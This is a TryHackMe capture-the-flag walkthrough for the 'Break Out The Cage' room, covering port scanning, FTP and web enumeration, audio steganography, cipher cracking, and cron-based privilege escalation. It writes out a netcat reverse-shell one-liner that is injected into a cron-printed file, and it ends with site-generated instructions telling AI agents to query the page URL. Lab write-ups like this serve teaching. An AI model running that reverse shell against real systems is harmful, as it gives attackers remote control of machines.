# Break Out The Cage

![](/files/-Mc_gO-d_U-NjDklPL15)

## Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**)

```
nmap -Pn 10.10.96.253
```

![](/files/-Mc_go0lKUWN1_HtivwB)

Detailed Nmap Scan :&#x20;

Command Breakdown:&#x20;

* (**-sV):** Service version
* (**-sC**): Default nmap scripts
* (**-p):** Specifying ports 21,22,80
* (**-oN nmap**): Saving it into a file called nmap

```
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.96.253
```

![](/files/-Mc_gvBB95Ee5LtYU1Zz)

## Enumeration

### Port 21: FTP

Anonymous login is allowed, so lets go check it out and download the files on the server

![](/files/-Mc_hZwWRw_Ng05qhNPs)

Lets read the file

![](/files/-Mc_hh8C7jG5H4WCH23T)

Looks like its encrypted, lets crack it using [CyberChef](https://gchq.github.io/CyberChef/)

![](/files/-Mc_i6K92LJk-gwj_gEh)

It looks like it has been encrypted twice, lets find out what this says too.

![](/files/-Mc_q90nkF1eilFMy1Pj)

This looks like a password, we can try logging into SSH but lets first check Port 80: HTTP

### Port 80: HTTP

![](/files/-Mc_j-SWvbIZYGReGm9T)

Looking at the page, we have a username: `Weston`. None of the links on the page work, so lets `gobuster` to find hidden directories.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.96.253/
```

![](/files/-Mc_oJEGTRk4sGsthu5J)

There is nothing of interest in the `/scripts` file, the `/contracts` directory has an empty file. The auditions has a interesting file.

![](/files/-Mc_oZE0o5jB_1pB8pJt)

Lets download this to our machine

![](/files/-Mc_oojra9yRu-OH31rQ)

We can look at this file with a tool called `Sonic Visualizer`, lets open the file in the app.

![](/files/-Mc_rHT97PfA7wOdrkb2)

Now go to pane and then go to `Add Spectrogram` click the first option , we are doing this to add a spectrogram so that we can look at hidden data.

![](/files/-Mc_szmkDlXt46_MtHLM)

We can see a box, lets see what is says.

![](/files/-Mc_tBgQPnMbmPAeGn-x)

After changing the color to get a better visual, we can see that it says `namelesstwo`. Checking around I found out that this is the key for the vignenere cipher that we can use to crack the text we found before.

![](/files/-Mc_tgYitDjQ2182oO6J)

We have the same text we found before, lets login through ssh now with the username we found in the start `Weston`.

![](/files/-Mc_u3tEkpnR9qhvLJJ3)

As the password worked, we can answer the first question

![](/files/-Mc_uI3mJ_U7TYCgp0I3)

## Privilege Escalation

I was looking around when a message popped up.

![](/files/-Mc_uX1AM4alDafOGiHA)

It looks like there is a cronjob running that executes this script every few minutes, lets go find it. I was searching for a while and could not find it, so lets transfer a tool onto this machine called [pspy ](https://github.com/DominicBreuker/pspy)and have it find the `cron` file.

To transfer this file, lets start a http listener on our machine and download the file on the victim machine wget. If you just downloaded it, make sure to make it an executable.

![](/files/-Mc_w_G0SjXhQnwC8WNE)

Now lets start a http server.

![](/files/-Mc_wghdmITesU98GTJr)

Now lets download the file on the victims machine.

![](/files/-Mc_wtlhO4cP5ogdOxvZ)

Lets make the file an executable

![](/files/-Mc_x-C7XwKkkh6miW0t)

Now run the file.

![](/files/-Mc_x9g3kxDVn1dN95yl)

Looking through the output we find an interesting file which may be the one we are looking for.

![](/files/-Mc_xWS0xe7yX36wlPIe)

Lets check this file

![](/files/-Mc_xdkp1Jur2cc-OdRM)

Lets add a reverse shell to the file .quotes (As the .quotes file is being printed every few minutes) so that we can get a higher privileged user access, that is the owner of the file `./opt/.dads_scripts/.files/.quotes` **`cage`**. We can see this when we look at the permissions of the file

![](/files/-Mc_yrcQvbKbnK47zA0L)

The reverse shell we will be using is this

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
```

Lets echo the reverse shell into the file and start a netcat listener&#x20;

![](/files/-McaEbr6REtLaFndrpJF)

![](/files/-Mc_z7xqSIh8BybaOEyX)

After a while, you should get a reverse shell

![](/files/-Mca-dAeY1NvYey3HWFR)

Lets stabilize the shell

![](/files/-Mca-tDIAZqCZ1-R7_Aa)

Lets read the file in this directory

![](/files/-Mca0Bm_n_Myk6E-HlQW)

We have the user flag.

Next lets cd into the email backup folder and read all the files

![](/files/-McaBbvMVj4Gp4fSlbqX)

Looking through the files, the only interesting thing I found is the string in the third email and the number of times the word `FACE` has been used, this might be something that will help us, now lets copy it and try to crack it using Cyber Chef.

![](/files/-McaCAaCRJ1l3047v3Pl)

So `FACE` was actually the Key to crack this password, this is the password for the root account, lets switch users and read the root flag.

![](/files/-McaDtCHgjf1XvW7Xlpd)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://writeups.adityadindi.com/tryhackme/untitled/break-out-the-cage.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.